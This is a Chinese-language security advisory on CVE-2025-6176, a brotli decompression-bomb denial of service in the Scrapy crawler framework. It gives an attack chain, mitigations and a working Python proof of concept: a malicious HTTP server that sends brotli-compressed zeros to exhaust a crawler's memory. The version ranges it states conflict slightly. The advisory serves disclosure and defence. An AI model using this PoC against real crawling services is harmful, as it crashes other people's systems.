CVE-2025-6176 Scrapy brotli解压拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-6176

漏洞类型

拒绝服务(DoS)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Scrapy

漏洞概述

Scrapy是一款流行的Python开源网络爬虫框架，广泛应用于数据采集、搜索引擎构建、自动化测试等领域。该框架支持多种HTTP压缩格式以优化网络传输效率，其中包括brotli压缩算法。然而，Scrapy 2.13.2及之前版本在处理brotli压缩格式时存在严重的安全漏洞，攻击者可利用该漏洞发起拒绝服务攻击，导致目标系统崩溃。漏洞的根本原因在于Scrapy虽然针对传统的zip炸弹攻击（如zipbomb、gzipbomb）实现了防护机制，但未能针对brotli压缩格式的特殊压缩特性提供等效保护。brotli算法在处理零填充数据时能够达到极高的压缩比（理论上可超过1800:1），攻击者只需传输极小的恶意压缩数据即可触发大量的内存分配，最终耗尽服务器资源。研究表明，攻击者利用此漏洞可在少于80GB可用内存的系统上成功发起DoS攻击，这对于大多数云服务器和个人开发者环境而言都是极易达成的条件。由于Scrapy常用于自动化数据采集任务，该漏洞可能影响大量使用Scrapy进行生产环境数据抓取的组织和个人。

技术细节

该漏洞属于解压炸弹攻击的brotli变种。在传统防护机制中，Scrapy通过限制解压后的数据大小与压缩数据大小的比率来防止zip炸弹攻击。然而，brotli算法采用先进的熵编码和字典压缩技术，对特定类型数据（特别是零填充数据）具有极高的压缩效率。当Scrapy接收到经过brotli压缩的恶意响应时，解压过程会分配大量内存用于存储解压后的数据。具体攻击流程如下：1) 攻击者搭建恶意HTTP服务器；2) 服务器返回经过精心构造的brotli压缩数据，该数据解压后体积可达到原始传输量的数百甚至数千倍；3) Scrapy客户端在不知情的情况下对数据进行解压；4) 解压过程消耗大量内存资源；5) 当内存消耗超过系统限制时，触发OutOfMemoryError或系统OOM Killer，导致进程崩溃。由于brotli压缩的高效性，攻击者只需上传几十KB的恶意数据即可触发数GB甚至数十GB的内存分配。Scrapy的brotli解压实现位于HTTP响应处理模块，当启用自动解压功能时，所有经过brotli压缩的响应都会被自动处理，从而触发漏洞。攻击者可以利用任何需要Scrapy抓取的合法场景（如RSS订阅、API调用等）作为攻击向量。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意HTTP服务器，托管经过brotli压缩的恶意数据。该数据包含大量零字节，解压后体积可扩大数百倍。

STEP 2

步骤2

攻击者诱使受害者使用Scrapy爬虫访问恶意服务器，可通过在爬虫配置中添加恶意URL或劫持合法请求响应实现。

STEP 3

步骤3

Scrapy客户端发送HTTP请求到恶意服务器，服务器返回带有Content-Encoding: br头部的响应数据。

STEP 4

步骤4

Scrapy的响应处理模块自动对brotli压缩数据进行解压，触发brotli_decompress函数，将小体积压缩数据解压为大体积原始数据。

STEP 5

步骤5

解压过程分配大量内存用于存储解压后的数据，导致内存消耗急剧上升，触发系统OOM Killer或进程崩溃。

STEP 6

步骤6

受害者的Scrapy爬虫进程终止，数据采集任务中断，如果爬虫作为服务运行可能导致整个服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-6176 PoC - Scrapy Brotli Decompression DoS
This PoC demonstrates how a malicious server can cause Scrapy to consume excessive memory
by sending a specially crafted brotli-compressed response.
"""

import http.server
import brotli
import os
import threading

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    """Handler that serves malicious brotli-compressed content"""
    
    def do_GET(self):
        # Generate zero-filled data (highly compressible by brotli)
        # A small amount of data expands to huge size during decompression
        original_data = b'\x00' * (50 * 1024 * 1024)  # 50MB of zeros
        
        # Compress with brotli - achieves extreme compression ratio
        compressed_data = brotli.compress(original_data)
        print(f"[+] Original size: {len(original_data)} bytes")
        print(f"[+] Compressed size: {len(compressed_data)} bytes")
        print(f"[+] Compression ratio: {len(original_data)/len(compressed_data):.1f}:1")
        
        # Send response with brotli encoding
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Encoding', 'br')
        self.send_header('Content-Length', len(compressed_data))
        self.end_headers()
        self.wfile.write(compressed_data)
        
    def log_message(self, format, *args):
        pass

def start_malicious_server(port=8888):
    """Start the malicious HTTP server"""
    server = http.server.HTTPServer(('0.0.0.0', port), MaliciousHandler)
    print(f"[+] Malicious server running on port {port}")
    server.serve_forever()

def test_with_scrapy():
    """
    Test case using Scrapy to demonstrate the vulnerability
    Run this in a separate process after starting the malicious server
    """
    import scrapy
    from scrapy.crawler import CrawlerProcess
    
    class VulnerableSpider(scrapy.Spider):
        name = 'vulnerable_spider'
        start_urls = ['http://localhost:8888/']
        
        def parse(self, response):
            self.logger.info(f"Received response: {len(response.body)} bytes")
    
    process = CrawlerProcess()
    process.crawl(VulnerableSpider)
    process.start()

if __name__ == '__main__':
    # Start malicious server in background thread
    server_thread = threading.Thread(target=start_malicious_server, daemon=True)
    server_thread.start()
    
    print("\n[!] This PoC demonstrates the vulnerability.")
    print("[!] In real attack scenarios, the attacker controls the server")
    print("[!] and tricks Scrapy clients into fetching the malicious content.")
    print("[!] The decompression will consume excessive memory.")
    
    # Keep server running
    try:
        server_thread.join()
    except KeyboardInterrupt:
        pass

影响范围

Scrapy < 2.13.2

Scrapy 2.0.0 - 2.13.2

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 限制Scrapy爬虫的并发数量和总内存使用量；2) 对来自不可信来源的HTTP响应实施严格的Content-Length和Content-Encoding校验；3) 在爬虫中间件中实现自定义的解压大小限制逻辑，拒绝处理解压后超过预期大小的响应；4) 使用应用层防火墙过滤异常的HTTP响应；5) 监控Scrapy进程的内存使用情况，设置告警阈值。需要注意的是，这些措施可能影响爬虫的正常功能，建议尽快升级到官方修复版本。